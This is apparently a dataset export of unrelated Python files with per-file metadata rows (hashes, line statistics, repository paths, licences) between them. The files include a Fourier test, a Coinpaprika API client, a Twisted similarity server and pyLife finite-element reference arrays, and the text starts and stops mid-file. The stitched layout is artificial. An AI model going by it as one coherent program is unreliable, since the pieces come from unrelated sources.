[1, 2, 3, 4, 5, 7, 8, 3, 4, 5, 6, 4, 3, 4, 6, 7, 8, 9, 0, 64, 4],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20],
),
])
def test_optimise_residuals(test_data, test_times):
"""Test normalisation works for arrays of one and positive integers."""
import fourier_functions
alpha0, df = fourier_functions.fourier_to_coefficients(test_data)
components = fourier_functions.optimise_residuals(alpha0, df, test_data)
print(alpha0)
print(df)
expectedShape0 = (len(test_data), components+1)
expectedShape1 = (components, 3)
expectedShape2 = (len(test_data), 4)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[0].shape, expectedShape0)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[1].shape, expectedShape1)
npt.assert_equal(fourier_functions.calc_residuals(alpha0, df, test_data, test_times, components)[2].shape, expectedShape2)
| 27.022082
| 126
| 0.466028
| 907
| 8,566
| 4.245865
| 0.081588
| 0.021293
| 0.026487
| 0.030122
| 0.890418
| 0.867567
| 0.850428
| 0.796157
| 0.782914
| 0.708387
| 0
| 0.075114
| 0.409409
| 8,566
| 316
| 127
| 27.107595
| 0.686104
| 0.054284
| 0
| 0.71134
| 0
| 0
| 0.02974
| 0
| 0
| 0
| 0
| 0
| 0.058419
| 1
| 0.020619
| false
| 0
| 0.027491
| 0
| 0.04811
| 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
863256f4fa84c9896de8c6cdc9b3ad9876192f99
| 3,569
|
py
|
Python
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | 5
|
2021-01-30T10:54:33.000Z
|
2022-02-18T03:05:03.000Z
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | 1
|
2021-09-01T14:51:49.000Z
|
2021-09-01T14:51:49.000Z
|
src/Coinpaprika/CoinpaprikaTags.py
|
coinpaper/coinpaprika-api-python-client
|
f819e38cf8657c9751ee55e638f3ed33d32346a4
|
[
"MIT"
] | null | null | null |
from typing import List, Dict
from .Coinpaprika import Coinpaprika
class CoinpaprikaTags():
def __call__(self, *additional_fields: str) -> List[Dict]:
"""
List tags
:param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: [
{
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
]
"""
return self.all(*additional_fields)
@staticmethod
def all(*additional_fields) -> List[Dict]:
"""
List tags
:param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: [
{
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
]
"""
additional_fields_str = ",".join(additional_fields)
return Coinpaprika.get("/tags", params={"additional_fields": additional_fields_str})
@staticmethod
def with_id(tag_id, *additional_fields: str) -> Dict:
"""
Get tag by ID
:param additional_fields: List of additional fields to include in query result for each tag.
Currently supported values are: "coins" and "icos".
:return: {
"id": "blockchain-service",
"name": "Blockchain Service",
"coin_counter": 160,
"ico_counter": 80,
"description": "A solution for companies wanting to build, host and use their own blockchain apps, smart contracts and functions on the blockchain.",
"type": "functional",
"coins": [
"dcr-decred",
"hc-hypercash",
"nxs-nexus"
],
"icos": [
"kodakcoin-kodakone",
"acad-academy"
]
}
"""
additional_fields_str = ",".join(additional_fields)
return Coinpaprika.get(f"/tags/{tag_id}", params={"additional_fields": additional_fields_str})
| 39.655556
| 169
| 0.464556
| 297
| 3,569
| 5.474747
| 0.262626
| 0.177122
| 0.070111
| 0.046125
| 0.851169
| 0.851169
| 0.800738
| 0.800738
| 0.800738
| 0.800738
| 0
| 0.007523
| 0.4413
| 3,569
| 89
| 170
| 40.101124
| 0.807924
| 0.650602
| 0
| 0.307692
| 0
| 0
| 0.079826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.153846
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
86328f63b583b319613fa3fd9e9cb3978380b8f4
| 96
|
py
|
Python
|
medium/unit-testing/mock_example.py
|
saneravi/ML_Stuff
|
74e1ed7ba9f4dccb555792315a14ba6071150304
|
[
"MIT"
] | 209
|
2015-01-02T03:47:12.000Z
|
2022-03-06T16:54:47.000Z
|
medium/unit-testing/mock_example.py
|
Kerwin-Xie/algorithms
|
4347a9b7bf54ef378d16d26ef9e357ddc710664b
|
[
"MIT"
] | 3
|
2015-12-06T14:40:34.000Z
|
2021-03-22T17:40:24.000Z
|
medium/unit-testing/mock_example.py
|
Kerwin-Xie/algorithms
|
4347a9b7bf54ef378d16d26ef9e357ddc710664b
|
[
"MIT"
] | 114
|
2015-01-31T08:37:10.000Z
|
2022-02-23T04:42:28.000Z
|
import datetime
def generate_filename():
return f"{datetime.datetime.now():%Y-%m-%d}.png"
| 16
| 52
| 0.6875
| 14
| 96
| 4.642857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 5
| 53
| 19.2
| 0.77381
| 0
| 0
| 0
| 1
| 0
| 0.395833
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
8632d44bad398f1ca4197110829df69df1ed24eb
| 115
|
py
|
Python
|
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
flask_mongoengine/wtf/__init__.py
|
lokeshmeher/custom_flask_mongoengine
|
9d6e605f4c17c9d7ca0e55a539215707c8e1272d
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_mongoengine.wtf.orm import model_fields, model_form
from flask_mongoengine.wtf.base import WtfBaseField
| 38.333333
| 62
| 0.878261
| 17
| 115
| 5.705882
| 0.647059
| 0.185567
| 0.412371
| 0.474227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078261
| 115
| 2
| 63
| 57.5
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
863e98afe63fea81844127a53b6f0a1e9165a703
| 5,517
|
py
|
Python
|
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
server.py
|
Jental/find_answer
|
0f178e4b033b5c5e006c1f3779db1d9a3baddacf
|
[
"MIT"
] | null | null | null |
from twisted.web.resource import Resource
from twisted.internet import reactor
from twisted.web.server import Site
import json
import numpy as np
import similarity
class MainPage(Resource):
isLeaf = True
def __init__(self, finder):
Resource.__init__(self)
self.finder = finder
def render_GET(self, request):
print("You're request was %s" % request.args)
request.responseHeaders.addRawHeader(b"Content-Type", b"application/json; charset=utf-8")
if b'q' in request.args:
for bsentence in request.args[b'q']:
sentence = bsentence.decode('utf-8')
print('->', sentence)
answer, found, dist, vec, fvec, fvec2 = self.finder.find_answer(sentence, 0)
a1 = {
'answer' : answer,
'found' : found,
'vector' : np.array2string(vec),
'found_vector': np.array2string(fvec),
'found_vector_2': np.array2string(fvec2),
'dist': dist,
'similarities': {
'simple': similarity.sentence_similarity_samewords(sentence, found),
'wordvec': similarity.sentence_similarity_wordvectors(sentence, found),
'jsm': similarity.sentence_similarity_jsm(sentence, found),
'jsm, su': similarity.sentence_similarity_jsm(sentence, found, mode=1),
'jsm, avg': similarity.sentence_similarity_jsm(sentence, found, mode=2),
'jsm, pairs': similarity.sentence_similarity_jsm_pairs(sentence, found),
'jsm, pairs, su': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=1),
'jsm, pairs, avg': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=2),
'jsm, allpairs': similarity.sentence_similarity_jsm_allpairs(sentence, found),
'jsm, allpairs, su': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=1),
'jsm, allpairs, avg': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=2),
'vec': similarity.sentence_similarity_vec(sentence, found),
'vec2': similarity.sentence_similarity_vec2(sentence, found)
}
}
answer, found, dist, vec, fvec, fvec2 = self.finder.find_answer(sentence, 1)
a2 = {
'answer' : answer,
'found' : found,
'vector' : np.array2string(vec),
'found_vector': np.array2string(fvec),
'found_vector_2': np.array2string(fvec2),
'dist': dist,
'similarities': {
'simple': similarity.sentence_similarity_samewords(sentence, found),
'wordvec': similarity.sentence_similarity_wordvectors(sentence, found),
'jsm': similarity.sentence_similarity_jsm(sentence, found),
'jsm, su': similarity.sentence_similarity_jsm(sentence, found, mode=1),
'jsm, avg': similarity.sentence_similarity_jsm(sentence, found, mode=2),
'jsm, pairs': similarity.sentence_similarity_jsm_pairs(sentence, found),
'jsm, pairs, su': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=1),
'jsm, pairs, avg': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=2),
'jsm, allpairs': similarity.sentence_similarity_jsm_allpairs(sentence, found),
'jsm, allpairs, su': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=1),
'jsm, allpairs, avg': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=2),
'vec': similarity.sentence_similarity_vec(sentence, found),
'vec2': similarity.sentence_similarity_vec2(sentence, found)
}
}
answer, found, dist, vec, fvec, fvec2 = self.finder.find_answer(sentence, 2)
a3 = {
'answer' : answer,
'found' : found,
'vector' : np.array2string(vec),
'found_vector': np.array2string(fvec),
'found_vector_2': np.array2string(fvec2),
'dist': dist,
'similarities': {
'simple': similarity.sentence_similarity_samewords(sentence, found),
'wordvec': similarity.sentence_similarity_wordvectors(sentence, found),
'jsm': similarity.sentence_similarity_jsm(sentence, found),
'jsm, su': similarity.sentence_similarity_jsm(sentence, found, mode=1),
'jsm, avg': similarity.sentence_similarity_jsm(sentence, found, mode=2),
'jsm, pairs': similarity.sentence_similarity_jsm_pairs(sentence, found),
'jsm, pairs, su': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=1),
'jsm, pairs, avg': similarity.sentence_similarity_jsm_pairs(sentence, found, mode=2),
'jsm, allpairs': similarity.sentence_similarity_jsm_allpairs(sentence, found),
'jsm, allpairs, su': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=1),
'jsm, allpairs, avg': similarity.sentence_similarity_jsm_allpairs(sentence, found, mode=2),
'vec': similarity.sentence_similarity_vec(sentence, found),
'vec2': similarity.sentence_similarity_vec2(sentence, found)
}
}
# res = '[' + json.dumps(a1) + ', ' + json.dumps(a2) + ', ' + json.dumps(a3) + ']';
res = json.dumps([a1, a2, a3], ensure_ascii=False)
answerJson = res.encode('utf-8')
print('<-', res)
return answerJson
else:
request.setResponseCode(400)
print("Unknown query")
return '{"error" ; "Unknown query"}'.encode('utf-8')
| 52.542857
| 103
| 0.646185
| 595
| 5,517
| 5.793277
| 0.147899
| 0.203655
| 0.316797
| 0.24282
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0.815492
| 0
| 0.014363
| 0.230198
| 5,517
| 104
| 104
| 53.048077
| 0.797269
| 0.015226
| 0
| 0.612245
| 0
| 0
| 0.124655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020408
| false
| 0
| 0.061224
| 0
| 0.122449
| 0.040816
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
866b6fbb387f3280e15fadd668dbca7cb16bb100
| 16,385
|
py
|
Python
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 57
|
2019-11-29T23:45:08.000Z
|
2022-03-31T09:11:20.000Z
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 6
|
2021-03-29T10:40:42.000Z
|
2022-03-30T12:29:10.000Z
|
tests/vmap/reference_data.py
|
alexander-maier/pylife
|
a9dceb3f364af16bf0a2d3015e34fa47192bfcf6
|
[
"Apache-2.0",
"MIT"
] | 10
|
2020-09-28T17:44:47.000Z
|
2022-01-21T17:59:19.000Z
|
import numpy as np
import pandas as pd
beam_2d_squ_nodes = pd.DataFrame(
data=np.array([[-30., 25., 0.],
[-25., 25., 0.],
[-20., 25., 0.],
[-15., 25., 0.],
[-10., 25., 0.],
[-5., 25., 0.],
[0., 25., 0.],
[5., 25., 0.],
[10., 25., 0.],
[-30., 30., 0.],
[-25., 30., 0.],
[-20., 30., 0.],
[-15., 30., 0.],
[-10., 30., 0.],
[-5., 30., 0.],
[0., 30., 0.],
[5., 30., 0.],
[10., 30., 0.]]),
columns=['x', 'y', 'z'],
index=pd.Index(np.arange(1, 19), name="node_id")
)
beam_2d_squ_mesh_index = pd.MultiIndex.from_arrays(
[
[1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8],
[1, 2, 11, 10, 2, 3, 12, 11, 3, 4, 13, 12, 4, 5, 14, 13, 5, 6, 15, 14, 6, 7, 16, 15, 7, 8, 17, 16, 8, 9, 18, 17]
],
names=['element_id', 'node_id']
)
beam_2d_squ_mesh_index_load = pd.MultiIndex.from_arrays(
[
[8],
[9]
],
names=['element_id', 'node_id']
)
beam_2d_squ_mesh_index_fix = pd.MultiIndex.from_arrays(
[
[1, 1],
[1, 10]
],
names=['element_id', 'node_id']
)
rotsym_quad_mesh_index_ysym = pd.MultiIndex.from_arrays(
[
[7, 7, 7, 7, 8, 8, 8, 8],
[5, 4, 13, 14, 14, 13, 2, 6]
],
names=['element_id', 'node_id']
)
rotsym_quad_mesh_coords_ysym = pd.DataFrame(
data=np.array([
[5.0, 10., 0.0],
[7.5, 12.5, 0.0],
[4.70654774, 12.4430714, 0.0],
[2.5, 10., 0.0],
[2.5, 10., 0.0],
[4.70654774, 12.4430714, 0.0],
[2.66258526, 12.3712873, 0.0],
[0.0, 10., 0.0],
]),
columns=['x', 'y', 'z'],
index=rotsym_quad_mesh_index_ysym
)
rotsym_quad_stress_cauchy = pd.DataFrame(
data=np.array([
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[-3.284145e+07, -68454408.0, 7530090.0, -57887692.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[4.888547e+06, -68804624.0, 29415748.0, -27465756.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[6.864822e+06, -93171472.0, 36264708.0, -10031535.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[-6.003653e+06, -259111728.0, -35755684.0, -68525928.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[1.262036e+07, -140693424.0, 22133048.0, -62435780.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[3.393907e+07, -103849112.0, 58507512.0, -25443218.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-9.841458e+07, -257062992.0, -87320816.0, -94479832.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-6.229298e+07, -272502592.0, -82643808.0, 15466551.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-5.494630e+07, -156407904.0, -39763184.0, 45185840.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[-1.266122e+06, -202149280.0, 5385842.5, -27361616.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
[7.847147e+07, -129699864.0, 78872944.0, -21347140.0, 0.0, 0.0],
]),
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23'],
index=pd.MultiIndex.from_tuples([
(1, 4),
(1, 8),
(1, 17),
(1, 13),
(2, 8),
(2, 9),
(2, 18),
(2, 17),
(3, 9),
(3, 1),
(3, 10),
(3, 18),
(4, 13),
(4, 17),
(4, 11),
(4, 2),
(5, 17),
(5, 18),
(5, 12),
(5, 11),
(6, 18),
(6, 10),
(6, 3),
(6, 12),
(7, 5),
(7, 4),
(7, 13),
(7, 14),
(8, 14),
(8, 13),
(8, 2),
(8, 6),
(9, 2),
(9, 11),
(9, 15),
(9, 6),
(10, 11),
(10, 12),
(10, 16),
(10, 15),
(11, 12),
(11, 3),
(11, 7),
(11, 16)],
names=['element_id', 'node_id'])
)
beam_2d_squ_mesh_coords = pd.DataFrame(data=np.array(
[
[-30., 25., 0.], # 1
[-25., 25., 0.], # 2
[-25., 30., 0.], # 11
[-30., 30., 0.], # 10
[-25., 25., 0.], # 2
[-20., 25., 0.], # 3
[-20., 30., 0.], # 12
[-25., 30., 0.], # 11
[-20., 25., 0.], # 3
[-15., 25., 0.], # 4
[-15., 30., 0.], # 13
[-20., 30., 0.], # 12
[-15., 25., 0.], # 4
[-10., 25., 0.], # 5
[-10., 30., 0.], # 14
[-15., 30., 0.], # 13
[-10., 25., 0.], # 5
[-5., 25., 0.], # 6
[-5., 30., 0.], # 15
[-10., 30., 0.], # 14
[-5., 25., 0.], # 6
[0., 25., 0.], # 7
[0., 30., 0.], # 16
[-5., 30., 0.], # 15
[0., 25., 0.], # 7
[5., 25., 0.], # 8
[5., 30., 0.], # 17
[0., 30., 0.], # 16
[5., 25., 0.], # 8
[10., 25., 0.], # 9
[10., 30., 0.], # 18
[5., 30., 0.], # 17
]),
columns=['x', 'y', 'z'],
index=beam_2d_squ_mesh_index
)
beam_2d_squ_node_displacement = pd.DataFrame(
data=np.array(
[
[-800.000E-36, -94.4166E-36, 0.0],
[-7.79987E-06, -7.80086E-06, 0.0],
[-14.5600E-06, -30.1635E-06, 0.0],
[-20.2799E-06, -65.0026E-06, 0.0],
[-24.9600E-06, -110.247E-06, 0.0],
[-28.5999E-06, -163.804E-06, 0.0],
[-31.2000E-06, -223.611E-06, 0.0],
[-32.7599E-06, -287.566E-06, 0.0],
[-33.2800E-06, -353.614E-06, 0.0],
[800.000E-36, -5.58338E-36, 0.0],
[7.80013E-06, -7.80174E-06, 0.0],
[14.5600E-06, -30.1617E-06, 0.0],
[20.2801E-06, -65.0052E-06, 0.0],
[24.9600E-06, -110.243E-06, 0.0],
[28.6001E-06, -163.809E-06, 0.0],
[31.2000E-06, -223.605E-06, 0.0],
[32.7601E-06, -287.572E-06, 0.0],
[33.2800E-06, -353.607E-06, 0.0]
]
),
columns=['dx', 'dy', 'dz'],
index=pd.Index(np.arange(1, 19), name="node_id")
)
beam_3d_hex_element_volume = pd.DataFrame(
data=[1e3, 1e3, 1e3, 1e3],
columns=['Ve'],
index=pd.Index([1, 2, 3, 4], name='element_id')
)
beam_3d_hex_stress_element_volume = pd.DataFrame(
data=np.array([
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
]),
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23', 'V_e'],
index=pd.MultiIndex.from_arrays(np.array([
[1, 5],
[1, 6],
[1, 8],
[1, 7],
[1, 1],
[1, 2],
[1, 4],
[1, 3],
[2, 9],
[2, 10],
[2, 12],
[2, 11],
[2, 5],
[2, 6],
[2, 8],
[2, 7],
[3, 13],
[3, 14],
[3, 16],
[3, 15],
[3, 9],
[3, 10],
[3, 12],
[3, 11],
[4, 17],
[4, 18],
[4, 20],
[4, 19],
[4, 13],
[4, 14],
[4, 16],
[4, 15],
]).T, names=['element_id', 'node_id'])
)
beam_2d_squ_element_nodal_stress = pd.DataFrame(
data=[
[-390.938E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, -17.7838, 0., -20., 0., 0.],
[-390.938E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, 17.8522, 0., -20., 0., 0.],
[-393.265E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, -17.9894, 0., -20., 0., 0.],
[-300.185E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, 18.1959, 0., -20., 0., 0.],
[-316.474E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, -18.4724, 0., -20., 0., 0.],
[-37.2320E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, 18.8200, 0., -20., 0., 0.],
[567.792E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, -19.2400, 0., -20., 0., 0.],
[353.706E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, 19.7342, 0., -20., 0., 0.],
[-316.474E-12, 19.7342, 0., -20., 0., 0.],
[-316.474E-12, 19.7342, 0., -20., 0., 0.],
[-195.469E-12, 19.7342, 0., -20., 0., 0.],
],
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23'],
index=beam_2d_squ_mesh_index
)
beam_2d_squ_element_nodal_strain = pd.DataFrame(
data=[
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
